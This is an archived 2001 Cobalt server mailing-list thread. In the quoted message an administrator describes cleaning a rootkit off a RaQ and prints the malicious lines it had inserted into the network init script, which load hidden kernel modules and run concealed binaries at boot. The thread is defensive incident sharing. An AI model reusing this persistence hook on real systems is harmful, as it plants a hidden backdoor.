[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

RE: [cobalt-users] Recent Hacks (resolution in sight)

Subject: RE: [cobalt-users] Recent Hacks (resolution in sight)
From: "Colin J. Raven" <cjraven@xxxxxxxxxxx>
Date: Fri Feb 9 05:45:05 2001
List-id: Mailing list for users to share thoughts on Cobalt products. <cobalt-users.list.cobalt.com>

oh wait...the GUI is unavailable??? How so?
Can you get in via the serial port and a console session?
Is it a RAQ or a Qube?
I had no success with the serial port on the Qube, but I have been told
since that there may be somehting wrong with the harware, *your*
mileage may vary.
-C

>-----Original Message-----
>From: cobalt-users-admin@xxxxxxxxxxxxxxx
>[mailto:cobalt-users-admin@xxxxxxxxxxxxxxx]On Behalf Of Chris Mason
>Sent: Friday, February 09, 2001 7:46 AM
>To: cobalt-users@xxxxxxxxxxxxxxx
>Subject: RE: [cobalt-users] Recent Hacks (resolution in sight)
>
>
>You think you have problems! I got so paranoid with all this
>talk of cracked
>machines that I rushed this morning to install ipchains, pmfirewall,
>portsentry, and logcheck. I only use SSH, I've disabled telnet.
>Unfortunately I was a little careless in my installation and I have now
>totally locked myself out of the machine. I can't ssh, there's
>no telnet,
>the gui is not available as I installed a certificate, I don't
>know what
>next to do. Even tech support at the hosting location may not
>be able to get
>in!
>
>Any ideas?
>
>Chris Mason
>Box 340, The Valley, Anguilla, British West Indies
>Tel: 264 497 5670 Fax: 264 497 8463
>USA Fax (561) 382-7771
>Take a virtual tour of the island
>http://net.ai/ The Anguilla Guide
>Find out more about NetConcepts
>www.netconcepts.ai
>Talk to me in real time with Instant Messenger: masonc92@xxxxxxxxxxx
>
>-----Original Message-----
>From: cobalt-users-admin@xxxxxxxxxxxxxxx
>[mailto:cobalt-users-admin@xxxxxxxxxxxxxxx]On Behalf Of inc
>Sent: Friday, February 09, 2001 8:35 AM
>To: cobalt-users@xxxxxxxxxxxxxxx
>Subject: [cobalt-users] Recent Hacks (resolution in sight)
>
>
>
>thanks to those who maintained email with me today; it's been
>a great help.
>
>here's my report:
>
>
>i've successfully (touch wood) used the unhack.pl script recommended by
>Steve Bassi via Mike Fritsch.
>
>after running unhack.pl, there's one file that unhack said was neither
>hacked (according to its internal MD5 checksums) nor "original" cobalt.
>
>this file, /etc/rc.d/init.d/network contains the following
>which i would say
>is part of the hack.
>
>        /usr/bin/ssh2d -q
>        if test -f "/dev/kmod"; then
>        /sbin/insmod -f /usr/lib/crth.o
>        /sbin/insmod -f /usr/lib/crtz.o
>        fi
>        if test -f /lib/security/.config/sn ; then
>        cd /lib/security/.config;./lpsched
>        fi
>        touch /var/lock/subsys/network
>        if test -f "/dev/dos"; then
>        /usr/lib/lpq
>        fi
>        ;;
>
>
>i've not installed ssh2d, and crth.o and crtz.o look damned
>nasty to me.
>note that unhack.pl DOESN'T clear up crtz.o.  can anyone shed
>some light on
>the remaining commands there?  i've disabled all these lines
>until i know
>what they are.  my "network" script was considerably more
>complicated than
>the "network" script included with unhack.tar.gz
>
>i also spent the whole day studying up on cracking and
>studying the scripts
>and binaries that were placed on my raq.
>
>the only weird thing i could find in my logs was an ftp login
>from korea.  i
>have not published any ftp site urls anywhere, and this is the only ftp
>login i've ever seen in the logs apart from my own, and the 127.0.0.1
>entries used by the admin.  this ftp login occurred 4 hours before the
>rootkit was activated.
>
>so i would think that proftpd was exploited to gain root access.
>
>all log entries bar the ftp one above were cleaned up, but there were
>footsteps left behind in /.bash_history which reflected an rcp
>download from
>a us .edu site.
>
>at this point ps, su, all manner of executables are replaced
>to hide any
>unusual activity.  flash22 suggested i try "top" -- which lo and behold
>turned up all my logins running as "/bin/xlogin" -- which
>appeared to be a
>copy of the original cobalt "/bin/login" .. a file
>/etc/ld.so.hash seems to
>have a crypted password in it.  the replaced "/bin/login" was
>a very small
>file next to the original cobalt "/bin/login".
>
>
>i'm happy to answer any questions on this.
>
>thanks again to those who helped me climb out of the black hole!
>
>
>--
>chris paul
>fastmedia.net
>
>
>
>
>_______________________________________________
>cobalt-users mailing list
>cobalt-users@xxxxxxxxxxxxxxx
>To Subscribe or Unsubscribe, please go to:
>http://list.cobalt.com/mailman/listinfo/cobalt-users
>
>
>
>_______________________________________________
>cobalt-users mailing list
>cobalt-users@xxxxxxxxxxxxxxx
>To Subscribe or Unsubscribe, please go to:
>http://list.cobalt.com/mailman/listinfo/cobalt-users
>

References:
- RE: [cobalt-users] Recent Hacks (resolution in sight)
  - From: Chris Mason

Prev by Date: RE: [cobalt-users] Recent Hacks (resolution in sight)
Next by Date: Re: [cobalt-users] /etc/ftpusers
Previous by thread: RE: [cobalt-users] Recent Hacks (resolution in sight)
Next by thread: Re: [cobalt-users] Recent Hacks (resolution in sight)

Sun Cobalt Users Message Index

Sun Cobalt Users Thread Index